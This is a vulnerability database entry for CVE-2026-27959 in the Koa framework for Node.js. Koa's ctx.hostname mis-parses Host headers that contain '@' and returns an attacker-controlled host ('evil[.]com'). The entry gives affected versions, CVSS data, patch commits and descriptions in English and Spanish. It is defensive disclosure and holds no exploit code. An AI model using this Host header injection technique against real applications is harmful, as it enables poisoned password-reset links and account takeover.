"title": "koa: Koa: Host header injection vulnerability due to malformed HTTP Host header parsing"
}
]
}
FKIE_CVE-2026-27959
Vulnerability from fkie_nvd - Published: 2026-02-26 02:16 - Updated: 2026-02-28 00:55| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df | Patch | |
| security-advisories@github.com | https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb | Patch | |
| security-advisories@github.com | https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm | Exploit, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "47B8F313-898E-4B6D-936A-8F35AC7E7C20",
"versionEndExcluding": "2.16.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:koajs:koa:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "D5367576-B8D5-45EE-9214-D40A4E6E1049",
"versionEndExcluding": "3.1.2",
"versionStartIncluding": "3.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Koa is middleware for Node.js using ES2017 async functions. Prior to versions 3.1.2 and 2.16.4, Koa\u0027s `ctx.hostname` API performs naive parsing of the HTTP Host header, extracting everything before the first colon without validating the input conforms to RFC 3986 hostname syntax. When a malformed Host header containing a `@` symbol is received, `ctx.hostname` returns `evil[.]com` - an attacker-controlled value. Applications using `ctx.hostname` for URL generation, password reset links, email verification URLs, or routing decisions are vulnerable to Host header injection attacks. Versions 3.1.2 and 2.16.4 fix the issue."
},
{
"lang": "es",
"value": "Koa es un middleware para Node.js que utiliza funciones as\u00edncronas de ES2017. Antes de las versiones 3.1.2 y 2.16.4, la API `ctx.hostname` de Koa realiza un an\u00e1lisis ingenuo del encabezado Host HTTP, extrayendo todo lo que precede al primer signo de dos puntos sin validar que la entrada cumpla con la sintaxis de nombre de host de RFC 3986. Cuando se recibe un encabezado Host malformado que contiene un s\u00edmbolo \u0027@\u0027, `ctx.hostname` devuelve \u0027evil[.]com\u0027 - un valor controlado por el atacante. Las aplicaciones que utilizan `ctx.hostname` para la generaci\u00f3n de URL, enlaces de restablecimiento de contrase\u00f1a, URL de verificaci\u00f3n de correo electr\u00f3nico o decisiones de enrutamiento son vulnerables a ataques de inyecci\u00f3n de encabezado Host. Las versiones 3.1.2 y 2.16.4 solucionan el problema."
}
],
"id": "CVE-2026-27959",
"lastModified": "2026-02-28T00:55:26.413",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-02-26T02:16:23.317",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.